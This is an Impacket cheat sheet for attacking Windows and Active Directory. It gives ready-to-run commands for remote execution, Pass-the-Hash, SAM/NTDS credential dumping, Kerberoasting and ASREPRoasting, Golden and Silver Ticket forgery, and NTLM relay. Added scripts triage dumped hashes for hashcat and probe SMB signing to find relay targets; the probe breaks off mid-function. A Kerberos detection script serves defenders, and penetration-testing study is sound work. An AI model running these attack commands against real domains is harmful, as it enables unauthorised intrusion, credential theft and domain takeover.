
Impacket Toolkit Cheat Sheet

Overview

Impacket is a collection of Python classes for working with network protocols. It gives low-level programmatic access to packet construction and implements many protocols, including SMB1/2/3, MSRPC/DCERPC, NTLM, Kerberos, LDAP and MSSQL (TDS). It also ships a set of ready-to-use example scripts for penetration testing, mainly against Windows and Active Directory environments. Nearly all of the scripts share the same target syntax, [[domain/]username[:password]@]<target>, and the same authentication options (-hashes, -k, -no-pass, -aesKey), so the per-tool sections below differ mostly in what the script does once it is authenticated.

⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

From PyPI

pip install impacket

From GitHub

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
pip install .   # replaces the deprecated "python setup.py install"

On Kali Linux

sudo apt update
sudo apt install -y python3-impacket impacket-scripts

# python3-impacket is the library; impacket-scripts provides the commands, installed with an
# impacket- prefix and no .py suffix (impacket-psexec, impacket-secretsdump, impacket-ntlmrelayx, ...).
# Options are the same as for the psexec.py style names used below.

Using Virtual Environment

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Command Execution Tools

psexec.py

Executes commands on a remote Windows host over SMB, in the same way as Sysinternals PsExec: it uploads a service binary (RemComSvc) to the ADMIN$ share, creates and starts a service for it through the Service Control Manager (SVCCTL) and talks to it over a named pipe. The resulting shell runs as SYSTEM. The price is noise: a dropped executable that most AV engines flag, a new service (System log Event ID 7045) and a random service name unless -service-name is set. Requires local administrator rights on the target.

Basic Usage

psexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-k Use Kerberos authentication (ticket taken from the ccache in KRB5CCNAME; the target must be a hostname, not an IP)
-no-pass Don't ask for a password (use with -k, or for accounts with an empty password)
-port [port] Connect to SMB server port (default: 445)
-service-name NAME Name of the service to create (default: random)
-remote-binary-name NAME Name of the uploaded service binary (default: random)
-debug Turn DEBUG output ON

Examples

# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use a hash instead of a password (Pass-the-Hash). The LM half is normally the empty LM hash
# (aad3b435b51404eeaad3b435b51404ee) and may be left blank (-hashes :NTHASH). The NT hash below,
# 31d6cfe0d16ae931b73c59d7e0c089c0, is the well-known hash of an empty password and is used here only as a placeholder.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec.py

Also executes commands over SMB, but without dropping a binary: for every command it creates a service whose binary path is a cmd.exe one-liner that runs the command and redirects its output to a file on a share, starts the service, reads the output back and deletes it. Nothing is written to disk except the output file, which makes it somewhat quieter than psexec.py, but each command still creates a service (Event ID 7045) and the shell is non-interactive, since every line is a separate service execution. Runs as SYSTEM.

Basic Usage

smbexec.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-share SHARE Share from which the command output is read (default: C$)
-mode {SHARE,SERVER} SHARE reads output from the target's own share; SERVER starts a local SMB server that the target writes to (needs root for port 445)
-shell-type {cmd,powershell} Shell type to use (default: cmd)
-codec CODEC Codec used to decode the target's output (default: UTF-8)
-service-name NAME Service name to use (default: random)

Examples

# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec.py

Executes commands through WMI: it calls Win32_Process.Create over DCOM (TCP/135 plus a dynamic high port) and, by default, redirects the command's output to a file on the ADMIN$ share which it then reads over SMB. It runs in the context of the authenticating user (not SYSTEM), creates no service and drops no binary, which is why it is the usual first choice when psexec.py is too noisy. Without a command argument it opens a semi-interactive shell; with -nooutput or -silentcommand no SMB connection is made at all.

Basic Usage

wmiexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-share SHARE Share from which the command output is read (default: ADMIN$)
-nooutput Don't fetch the output (no SMB connection is created)
-silentcommand Run the command directly via Win32_Process.Create, without a cmd.exe wrapper (no output)
-codec CODEC Codec used to decode the target's output (default: UTF-8)
-shell-type {cmd,powershell} Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec.py

Executes commands through exposed DCOM objects (MMC20.Application, ShellWindows or ShellBrowserWindow) over TCP/135 plus a dynamic port; output is collected through the ADMIN$ share as with wmiexec.py. ShellWindows and ShellBrowserWindow are hosted by explorer.exe and only work while a user is interactively logged on to the target; MMC20.Application spawns mmc.exe and does not need one.

Basic Usage

dcomexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-object {ShellWindows,ShellBrowserWindow,MMC20} DCOM object used to run the command (default: ShellWindows)
-silentcommand Run the command without a cmd.exe wrapper and without fetching output (no SMB connection)
-codec CODEC Codec used to decode the target's output (default: UTF-8)
-shell-type {cmd,powershell} Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with a specific DCOM object (MMC20.Application works without an interactive user session)
dcomexec.py -object MMC20 administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py

Executes a single command through the Task Scheduler service (ATSVC, reached over the \pipe\atsvc named pipe on SMB): it registers a scheduled task that runs the command as SYSTEM, triggers it, reads the output from a temporary file via ADMIN$ and deletes the task again. Non-interactive, one command per invocation; the task creation is visible in the Task Scheduler operational log (and as Event ID 4698 when object auditing is enabled).

Basic Usage

atexec.py [domain/]username[:password]@target [options] command

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-silentcommand Run the command directly, not through cmd.exe (no output is collected)
-codec CODEC Codec used to decode the target's output (default: UTF-8)

Examples

# Execute a command with explicit credentials (atexec.py captures stdout itself; no redirect to a file is needed)
atexec.py administrator:Password123@192.168.1.100 whoami

# Execute a command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "ipconfig /all"

# Use a hash instead of a password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 whoami

Credential Dumping Tools

secretsdump.py

Dumps credentials from a remote Windows host: local SAM hashes, LSA secrets (cached domain logons, service-account passwords, the machine account password, DPAPI system keys) and, on a domain controller, the contents of NTDS.dit. For NTDS.dit the default method is DRSUAPI replication (the same mechanism as DCSync), which needs replication rights (Domain Admins, or explicit DS-Replication-Get-Changes / -All rights) and leaves no file on the DC; -use-vss instead copies the hive files out of a Volume Shadow Copy. SAM/LSA extraction needs local administrator rights and starts the Remote Registry service if it is stopped. The same script parses saved hives and an NTDS.dit file offline (target LOCAL).

Basic Usage

secretsdump.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-just-dc Extract only NTDS.dit data, NTLM hashes and Kerberos keys (domain controller only)
-just-dc-ntlm Extract only the NTLM hashes from NTDS.dit (domain controller only)
-just-dc-user USER Extract NTDS.dit data for one account only (DRSUAPI method only; e.g. krbtgt for a Golden Ticket)
-pwd-last-set Show the pwdLastSet attribute for each NTDS.dit account
-user-status Show whether each account is enabled or disabled
-history Also dump password history
-use-vss Dump NTDS.dit through a Volume Shadow Copy instead of DRSUAPI
-exec-method {smbexec,wmiexec,mmcexec} Remote execution method used by -use-vss (default: smbexec)
-sam FILE / -security FILE / -system FILE / -ntds FILE Parse saved hive files or an NTDS.dit offline (target LOCAL)
-outputfile FILE Base name for output files (.sam, .secrets, .ntds, ...)

Examples

# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only the NTLM hashes from NTDS.dit via DRSUAPI (needs replication rights, e.g. a Domain Admin)
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100
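After a dump the useful questions are which accounts share a password, which have none at all, and what to feed hashcat; here is an added triage script (written for this cheat sheet, not part of Impacket) over constructed lines in the shape of secretsdump output. The parenthesised annotations are the ones -pwd-last-set and -user-status append; every hash value except the well-known empty-password NT hash is made up.

```python
"""Triage secretsdump.py output: parse the hash lines, flag reused and empty passwords,
and produce input for 'hashcat -m 1000 --username'.

Added example for this cheat sheet, not Impacket code. SAMPLE is constructed in the shape
of secretsdump output (domain\\uid:rid:lmhash:nthash:::); the hashes are invented except
for the empty-password NT hash.
"""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# [DOMAIN\]user:RID:LM:NT::: followed by the optional " (pwdLastSet=... status=...)" annotation
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
    r"(?:\s*\((?P<extra>[^)]*)\))?\s*$",
    re.IGNORECASE,
)

SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (pwdLastSet=2021-03-09 10:11:12 status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210::: (status=Disabled)
CONTOSO\\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
CONTOSO\\svc_backup:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Enabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: (status=Enabled)
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2222222222222222222222222222222222222222222222222222222222222222
"""


def parse(text):
    """Yield one dict per NTLM hash line; banners and Kerberos-key lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        status = re.search(r"status=(\w+)", m.group("extra") or "")
        yield {
            "domain": m.group("domain"),
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
            "machine": m.group("user").endswith("$"),
            "enabled": None if status is None else status.group(1).lower() == "enabled",
        }


def triage(text):
    """Group accounts by NT hash: a shared hash means a shared password (NT hashes are
    unsalted); EMPTY_NT means the account has no password. Machine accounts are ignored
    for reuse because their passwords are random and rotated."""
    entries = list(parse(text))
    by_nt = defaultdict(list)
    for e in entries:
        if not e["machine"]:
            by_nt[e["nt"]].append(e["user"])
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT}
    empty = [e["user"] for e in entries if e["nt"] == EMPTY_NT and not e["machine"]]
    return {"entries": entries, "reused": reused, "empty_password": empty}


def hashcat_lines(entries, include_disabled=False, include_machine=False):
    """'user:nt' lines for hashcat -m 1000 --username; disabled and machine accounts are
    left out by default so cracking time goes to accounts that can actually log on."""
    out = []
    for e in entries:
        if e["machine"] and not include_machine:
            continue
        if e["enabled"] is False and not include_disabled:
            continue
        out.append(f"{e['user']}:{e['nt']}")
    return out


if __name__ == "__main__":
    result = triage(SAMPLE)
    for nt, users in result["reused"].items():
        print(f"[!] NT hash {nt} shared by: {', '.join(users)}")
    for user in result["empty_password"]:
        print(f"[!] empty password: {user}")
    print("\n".join(hashcat_lines(result["entries"])))
```

The same grouping works on a .ntds file written with -outputfile; run it with -user-status so that disabled accounts are annotated and can be skipped.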

Kerberos Attack Tools

GetNPUsers.py

Finds accounts with "Do not require Kerberos preauthentication" set and requests a TGT for them without knowing their password. Because preauthentication is disabled, the KDC answers with an AS-REP whose encrypted part is derived from the account's password, and that can be cracked offline (ASREPRoast). The output is the $krb5asrep$23$... format read by hashcat mode 18200 and by John the Ripper (krb5asrep). With valid domain credentials the affected accounts are enumerated over LDAP; without credentials a list of candidate usernames can be tested one AS-REQ at a time with -usersfile.

Basic Usage

GetNPUsers.py domain/[username[:password]] -dc-ip <DC_IP> [options]

Common Options

Option Description
-request Request the TGTs and print them in JtR/hashcat format (without it only the account list is shown)
-usersfile FILE File with one username per line to test; no credentials and no LDAP enumeration needed
-format {hashcat,john} Format of the saved AS-REP responses (default: hashcat)
-outputfile FILE Write the crackable AS-REPs to this file
-hashes LMHASH:NTHASH Use NTLM hashes for the authenticated LDAP enumeration (Pass-the-Hash)
-no-pass Don't ask for a password (use with -usersfile or with -k)
-k Use Kerberos authentication
-dc-ip IP IP address of the domain controller

Examples

# Authenticated: enumerate accounts without preauthentication over LDAP and request their AS-REPs
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -outputfile asrep.txt

# Authenticated: only list the vulnerable accounts, without requesting tickets
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100

# Unauthenticated: test a list of candidate usernames (one per line; use a one-line file for a single
# account). A vulnerable account answers with its AS-REP; others give KDC_ERR_PREAUTH_REQUIRED, and
# unknown names give KDC_ERR_C_PRINCIPAL_UNKNOWN, which also makes this a username enumeration check.
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -no-pass -format hashcat -outputfile asrep.txt

GetUserSPNs.py

Lists user accounts that have a Service Principal Name (SPN) and, with -request, asks the KDC for a service ticket (TGS) to each of them (Kerberoasting). The ticket is encrypted with the service account's key, so it can be cracked offline, and any authenticated domain user can request it. Impacket asks for RC4 (etype 23) where the account allows it, producing $krb5tgs$23$... hashes for hashcat mode 13100; accounts restricted to AES return etype 17/18 tickets (modes 19600/19700) which crack far more slowly. Machine accounts have SPNs too but random passwords, so the worthwhile targets are human-managed service accounts.

Basic Usage

GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options

Option Description
-request Request a TGS for every listed SPN and print them in JtR/hashcat format
-request-user USER Request a TGS only for the SPNs of this user (username only, no domain)
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-k Use Kerberos authentication
-dc-ip IP IP address of the domain controller
-outputfile FILE Write the crackable TGS tickets to this file (one format serves both hashcat and john)

Examples

# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get a TGS for one user's SPNs only
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request-user sqlservice

# Write the tickets to a file for hashcat (-m 13100 for etype 23) or john
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -outputfile kerberoast.txt

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
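Both attacks above leave a recognisable trace in the domain controller's Security log, which is worth knowing from either side of an engagement. The following is an added detection example (written for this cheat sheet, not Impacket code) over constructed events in the shape of a JSON export: a 4768 with PreAuthType 0 is an AS-REP handed out without pre-authentication (the GetNPUsers.py case), and a burst of 4769 RC4 (0x17) service tickets for user-account SPNs from one source is the GetUserSPNs.py -request pattern. Field names follow the Windows event schema; IPs and account names are invented.

```python
"""Detect ASREPRoast and Kerberoast activity in domain controller Kerberos audit events.

Added example for this cheat sheet (the detection-side complement of GetNPUsers.py and
GetUserSPNs.py); not Impacket code. Events are constructed dicts in the shape of a
JSON-exported Security log, using the Windows event schema field names.
  4768 (TGT requested) with PreAuthType 0: the DC answered an AS-REQ that carried no
       proof of the password, which is what GetNPUsers.py provokes.
  4769 (service ticket requested) with TicketEncryptionType 0x17 (RC4) for a user-account
       SPN: GetUserSPNs.py -request asks for RC4 so the ticket cracks faster.
"""
from collections import defaultdict

RC4_HMAC = "0x17"

SAMPLE_EVENTS = [
    # normal traffic: AES (0x12) tickets, a machine-account service, timestamp preauth (type 2)
    {"EventID": 4769, "IpAddress": "::ffff:10.0.0.25", "TargetUserName": "jdoe@CONTOSO.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "IpAddress": "::ffff:10.0.0.25", "TargetUserName": "jdoe",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2"},
    # GetUserSPNs.py -request from 10.0.0.99: RC4 tickets for three user SPNs in one burst
    {"EventID": 4769, "IpAddress": "::ffff:10.0.0.99", "TargetUserName": "lowpriv@CONTOSO.LOCAL",
     "ServiceName": "sqlservice", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "::ffff:10.0.0.99", "TargetUserName": "lowpriv@CONTOSO.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "IpAddress": "::ffff:10.0.0.99", "TargetUserName": "lowpriv@CONTOSO.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    # GetNPUsers.py from the same host: AS-REQ without pre-authentication, RC4 reply
    {"EventID": 4768, "IpAddress": "::ffff:10.0.0.99", "TargetUserName": "svc_legacy",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0"},
]


def is_kerberoast_request(ev):
    """4769 for an RC4 ticket to a user SPN. Machine accounts (name ends in $) and krbtgt
    are excluded: their keys are random and they legitimately receive many requests."""
    if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    return bool(svc) and not svc.endswith("$") and svc.lower() != "krbtgt"


def is_asreproast_request(ev):
    """4768 with PreAuthType 0: an AS-REP was issued without pre-authentication."""
    return ev.get("EventID") == 4768 and ev.get("PreAuthType") == "0"


def detect(events, kerberoast_threshold=3):
    """Alerts keyed by source IP. Kerberoasting is alerted on volume (distinct user SPNs
    from one IP reaching the threshold) because a single RC4 ticket can be legitimate;
    a single no-preauth AS-REP is already worth an alert."""
    roast_spns = defaultdict(set)
    asrep_users = defaultdict(set)
    for ev in events:
        ip = ev.get("IpAddress", "?").replace("::ffff:", "")
        if is_kerberoast_request(ev):
            roast_spns[ip].add(ev["ServiceName"])
        elif is_asreproast_request(ev):
            asrep_users[ip].add(ev["TargetUserName"])
    alerts = defaultdict(list)
    for ip, spns in roast_spns.items():
        if len(spns) >= kerberoast_threshold:
            alerts[ip].append(("kerberoast", sorted(spns)))
    for ip, users in asrep_users.items():
        alerts[ip].append(("asreproast", sorted(users)))
    return dict(alerts)


if __name__ == "__main__":
    for ip, found in detect(SAMPLE_EVENTS).items():
        for kind, names in found:
            print(f"[!] {kind} from {ip}: {', '.join(names)}")
```

Two caveats for production use: 4769 events also show 0x17 when the service account simply has no AES keys (msDS-SupportedEncryptionTypes unset) or the client only offers RC4, so in domains where RC4 is still common the threshold, not the etype alone, carries the detection; and IpAddress is the client's address as seen by the DC, which for a relayed or proxied attacker is the pivot host.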

ticketer.py

Forges Kerberos tickets offline. A Golden Ticket is a TGT signed with the krbtgt account's key (NT hash or AES key, obtainable with secretsdump.py -just-dc-user krbtgt) and is valid for the whole domain; a Silver Ticket is a service ticket for one SPN signed with that service account's key (for cifs/, host/ and similar SPNs that is the target machine account's hash) and never touches the DC. Both need the domain SID, which lookupsid.py prints. The ticket is written as <username>.ccache in the current directory and is used by pointing KRB5CCNAME at it and running any Impacket script with -k -no-pass against a hostname.

Basic Usage

ticketer.py [options] username

Common Options

Option Description
-nthash HASH NT hash of krbtgt (Golden Ticket) or of the service account (Silver Ticket)
-aesKey KEY AES key of krbtgt or of the service account, instead of -nthash (AES tickets stand out less than RC4 ones)
-domain DOMAIN Fully qualified domain name
-domain-sid SID Domain SID (S-1-5-21-...)
-spn SPN Service Principal Name to forge a Silver Ticket for (omit for a Golden Ticket)
-user-id RID RID placed in the PAC (default: 500)
-groups RIDS Comma-separated group RIDs for the PAC (default: 513, 512, 520, 518, 519)
-extra-sid SIDS Extra SIDs for the PAC, e.g. the forest root's Enterprise Admins SID for cross-domain use
-duration HOURS Ticket lifetime in hours (default: 10)

Examples

# Create a Golden Ticket (key = krbtgt NT hash); written to administrator.ccache
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create a Silver Ticket for MSSQL (key = NT hash of the account that holds that SPN, not krbtgt)
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Use the ticket (there is no output-file option; the file is always <username>.ccache)
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass contoso.local/administrator@dc01.contoso.local

# Convert to the Windows .kirbi format for use with Rubeus or Mimikatz
ticketConverter.py administrator.ccache administrator.kirbi

Network Protocols Tools

smbclient.py

Provides an SMB client to access shares and files on remote systems.

Basic Usage

smbclient.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-port [port] Connect to SMB Server port (default: 445)
-file FILE Input file with commands to execute in the mini shell
-debug Turn DEBUG output ON

Common Commands (Interactive Shell)

Command Description
help Show available commands
shares List available shares
use <share> Connect to a specific share
ls List files in the current directory
cd <dir> Change directory on the share
pwd Show the current directory on the share
lcd <dir> Change the local directory (where get/put read and write)
cat <file> Print a file's contents
get <file> Download a file
mget <wildcard> Download all matching files
put <file> Upload a file
rm <file> Delete a file
mkdir <dir> Create a directory
rmdir <dir> Remove a directory
info Show server information (OS, signing, ...)
exit Exit the shell

Examples

# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient.py

Provides a client to interact with Microsoft SQL Server instances.

Basic Usage

mssqlclient.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash; only meaningful with -windows-auth)
-windows-auth Use Windows (NTLM/Kerberos) authentication instead of a SQL login (default: False); required for domain accounts and for Pass-the-Hash
-port [port] Destination port to connect to (default: 1433)
-db DATABASE Database to select after connecting (default: None)
-file FILE Input file with SQL commands to execute in the SQL shell
-debug Turn DEBUG output ON

Common Commands (Interactive Shell)

Command Description
help Show available commands
enable_xp_cmdshell Enable xp_cmdshell (sp_configure 'show advanced options' and 'xp_cmdshell'; needs sysadmin)
disable_xp_cmdshell Disable xp_cmdshell again
xp_cmdshell <command> Execute an OS command through xp_cmdshell (runs as the SQL Server service account)
sp_start_job <command> Run a command through a SQL Server Agent job (alternative when xp_cmdshell is blocked)
enum_links / use_link <name> List linked servers and run queries through one (recent releases)
enum_impersonate / exec_as_login <login> List IMPERSONATE grants and switch to another login (recent releases)
exit Exit the shell

Examples

# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use a hash instead of a password (Pass-the-Hash; NTLM means Windows authentication, so -windows-auth is required)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/sqluser@192.168.1.100 -windows-auth

# Log in with a domain account (Windows authentication) instead of a SQL login
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Other Useful Tools

ntlmrelayx.py

Performs NTLM relay attacks: it runs its own SMB, HTTP(S), WCF and raw-NTLM listeners and, when a client authenticates to them, forwards the NTLM exchange to a target service (smb://, ldap://, ldaps://, mssql://, http://, imap://, smtp://, rpc:// and others) and then acts there as that user. Something must make victims authenticate to it: Responder with its SMB and HTTP servers turned off, an authentication-coercion technique, mitm6 with WPAD, or a planted UNC path. Relaying to SMB only works against hosts that do not require SMB signing (domain controllers require it by default; workstations and member servers usually do not); relaying to LDAP fails where LDAP signing or channel binding is enforced. Captured NetNTLM hashes are saved as well, so a failed relay still yields something to crack.

Basic Usage

ntlmrelayx.py [options]

Common Options

Option Description
-t TARGET Target to relay to, as protocol://[user:pass@]host[:port] (e.g. smb://10.0.0.5, ldap://dc01)
-tf FILE File with one target per line; relayed connections are distributed over them
-w Watch the target file for changes and reload it (only with -tf)
-e FILE Executable to upload and run on the target after a successful SMB relay
-c COMMAND Command to execute on the target after a successful relay (SMB and MSSQL targets)
-i Open an interactive client for each relayed session, bound to a local TCP port
-socks Keep relayed sessions open and expose them through a local SOCKS proxy (127.0.0.1:1080) for use with proxychains
-smb2support Enable SMB2/3 on the SMB listener (required for current Windows clients)
-l DIR Directory for loot such as dumped hashes (default: current directory)
-of FILE Base filename for the captured NetNTLM hashes
-debug Turn DEBUG output ON

Examples

# Relay to one SMB target; with no -c/-e the default action is to dump the target's SAM (secretsdump style)
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to a list of targets (hosts that do not require SMB signing), one relay per host
ntlmrelayx.py -tf targets.txt -smb2support

# Execute a command on each successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c 'whoami > C:\temp\whoami.txt'

# Keep the relayed sessions and use them through a SOCKS proxy
# (e.g. proxychains smbclient.py domain/user@192.168.1.100 -no-pass, no password needed)
ntlmrelayx.py -tf targets.txt -smb2support -socks
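Whether an SMB host is a usable relay target comes down to one bit in its NEGOTIATE response (SecurityMode & 0x0002, SigningRequired), so here is an added probe (written for this cheat sheet, not Impacket code) that builds a minimal SMB2 NEGOTIATE request, parses the response per MS-SMB2 and classifies the host. The offline demonstration uses constructed response bytes; probe() performs the real exchange on TCP/445 and assumes the server accepts a bare negotiate for dialects 2.0.2/2.1 (SMB1-only hosts return nothing parseable).

```python
"""Classify an SMB server as an ntlmrelayx.py relay target from its NEGOTIATE response.

Added example for this cheat sheet, not Impacket code. Packet layouts follow MS-SMB2
(2.2.1.2 header, 2.2.3 NEGOTIATE request, 2.2.4 NEGOTIATE response). _fake_response()
builds constructed responses for offline use; probe() is the live check.
"""
import os
import socket
import struct

SMB2_MAGIC = b"\xfeSMB"
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
FLAG_RESPONSE = 0x00000001  # SMB2_FLAGS_SERVER_TO_REDIR


def smb2_header(command, message_id=0):
    """64-byte SMB2 header, unsigned, request flags (Flags=0)."""
    return struct.pack("<4sHHIHHIIQIIQ16s",
                       SMB2_MAGIC, 64, 0, 0, command, 0, 0, 0, message_id, 0, 0, 0, b"\x00" * 16)


def negotiate_request():
    """SMB2 NEGOTIATE request (command 0) offering dialects 2.0.2 and 2.1, no contexts."""
    dialects = (0x0202, 0x0210)
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0, os.urandom(16), 0)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    return smb2_header(command=0) + body


def parse_negotiate_response(data):
    """(dialect, security_mode) from a raw SMB2 NEGOTIATE response, else None."""
    if len(data) < 70 or data[:4] != SMB2_MAGIC:
        return None
    command, = struct.unpack_from("<H", data, 12)
    flags, = struct.unpack_from("<I", data, 16)
    if command != 0 or not flags & FLAG_RESPONSE:
        return None
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if struct_size != 65:
        return None
    return dialect, security_mode


def relay_verdict(data):
    """'relayable', 'signing-required' or 'not-smb2'; only the first is useful for -t/-tf."""
    parsed = parse_negotiate_response(data)
    if parsed is None:
        return "not-smb2"
    _, mode = parsed
    return "signing-required" if mode & SIGNING_REQUIRED else "relayable"


def probe(host, port=445, timeout=3.0):
    """Live check over direct-hosted SMB: 4-byte NetBIOS session-service length prefix."""
    req = negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        hdr = s.recv(4)
        if len(hdr) < 4:
            return "no-response"
        length = struct.unpack(">I", hdr)[0] & 0x00FFFFFF
        data = b""
        while len(data) < length:
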